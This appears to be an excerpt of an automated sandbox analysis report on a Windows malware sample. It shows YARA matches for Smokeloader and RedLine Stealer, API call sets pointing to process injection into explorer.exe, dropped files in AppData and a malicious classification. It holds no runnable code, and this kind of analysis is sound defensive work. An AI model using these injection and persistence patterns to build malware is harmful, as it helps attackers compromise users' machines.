Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401514
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess, 0_2_00402F97
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401542
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA, 0_2_00403247
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401549
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA, 0_2_0040324F
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA, 0_2_00403256
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401557
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA, 0_2_0040326C
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 0_2_00403277
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014FE
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA, 0_2_00403290
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401514
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess, 4_2_00402F97
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401542
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA, 4_2_00403247
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401549
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA, 4_2_0040324F
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA, 4_2_00403256
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401557
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA, 4_2_0040326C
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA, 4_2_00403277
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_004014FE
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA, 4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess, 6_2_00403043
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00401508 NtAllocateVirtualMemory, 6_2_00401508
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014CF NtAllocateVirtualMemory, 6_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014DE NtAllocateVirtualMemory, 6_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014F5 NtAllocateVirtualMemory, 6_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014F8 NtAllocateVirtualMemory, 6_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004014FB NtAllocateVirtualMemory, 6_2_004014FB
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess, 7_2_00403043
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_004014C4
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_00401508 NtAllocateVirtualMemory, 7_2_00401508
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014CF NtAllocateVirtualMemory, 7_2_004014CF
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_004015D5
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014DE NtAllocateVirtualMemory, 7_2_004014DE
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_004015DF
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_004015E6
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_004015F2
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014F5 NtAllocateVirtualMemory, 7_2_004014F5
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014F8 NtAllocateVirtualMemory, 7_2_004014F8
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 7_2_004014FB NtAllocateVirtualMemory, 7_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E4B92 RtlMoveMemory,NtUnmapViewOfSection, 10_2_006E4B92
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E33C3 NtQueryInformationFile, 10_2_006E33C3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E342B NtQueryObject,NtQueryObject,RtlMoveMemory, 10_2_006E342B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle, 10_2_006E349B
Source: C:\Windows\explorer.exe Code function: 13_2_00CB38B0 NtUnmapViewOfSection, 13_2_00CB38B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 15_2_00191016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 15_2_00191819
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191A80 NtCreateSection,NtMapViewOfSection, 15_2_00191A80
Source: C:\Windows\explorer.exe Code function: 16_2_008C355C NtUnmapViewOfSection, 16_2_008C355C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 18_2_02FE1016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 18_2_02FE18BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE1B26 NtCreateSection,NtMapViewOfSection, 18_2_02FE1B26
Source: C:\Windows\explorer.exe Code function: 19_2_012B370C NtUnmapViewOfSection, 19_2_012B370C
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE29AC8 8_2_00007FF6DFE29AC8
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2A534 8_2_00007FF6DFE2A534
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2B43C 8_2_00007FF6DFE2B43C
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2DC20 8_2_00007FF6DFE2DC20
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE23220 8_2_00007FF6DFE23220
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2A78C 8_2_00007FF6DFE2A78C
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE2213C 8_2_00007FF6DFE2213C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E2198 10_2_006E2198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006EC2F9 10_2_006EC2F9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006FB35C 10_2_006FB35C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00734438 10_2_00734438
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006FB97E 10_2_006FB97E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E6E6A 10_2_006E6E6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00705F08 10_2_00705F08
Source: C:\Windows\explorer.exe Code function: 13_2_00CB1E20 13_2_00CB1E20
Source: C:\Windows\explorer.exe Code function: 16_2_008C2054 16_2_008C2054
Source: C:\Windows\explorer.exe Code function: 16_2_008C2860 16_2_008C2860
Source: C:\Windows\explorer.exe Code function: 19_2_012B2A04 19_2_012B2A04
Source: C:\Windows\explorer.exe Code function: 19_2_012B20F4 19_2_012B20F4
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040BC5C 38_2_0040BC5C
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_00408C7A 38_2_00408C7A
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040C889 38_2_0040C889
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040D5C1 38_2_0040D5C1
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040C1AD 38_2_0040C1AD
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_0040B70B 38_2_0040B70B
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040BC5C 39_2_0040BC5C
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_00408C7A 39_2_00408C7A
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040C889 39_2_0040C889
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040D5C1 39_2_0040D5C1
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040C1AD 39_2_0040C1AD
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 39_2_0040B70B 39_2_0040B70B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\FDDB.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 006E7F70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 006E8801 appears 40 times
Uses 32bit PE files
Source: 9VgIkx4su0.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@63/15@7/4
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_00401490 GetCurrentProcessId,GetCurrentProcessId,GetCharWidth32A,CreateDCW,CreateDCW,FoldStringW,EnumSystemCodePagesW,CreateDCW,CreateHardLinkA,WinHttpOpen,InterlockedDecrement,_strlen,LocalAlloc,LoadLibraryA,LoadLibraryA,GetProcAddress,GetLastError,InterlockedCompareExchange,InterlockedCompareExchange,GetDiskFreeSpaceExA,LoadLibraryA,ReadConsoleInputW,DebugBreak,LCMapStringA,SetEnvironmentVariableW,LCMapStringA,SetEnvironmentVariableW,OpenEventA,GetLastError,GetFileAttributesW,GetShortPathNameW,LocalFlags,GetFileAttributesW,GetShortPathNameW,LocalFlags,RaiseException,SetFileTime,SetComputerNameA,InterlockedDecrement,LoadLibraryW, 38_2_00401490
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00621706 CreateToolhelp32Snapshot,Module32First, 0_2_00621706
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE27138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance, 8_2_00007FF6DFE27138
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eihchav Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3E40.tmp Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
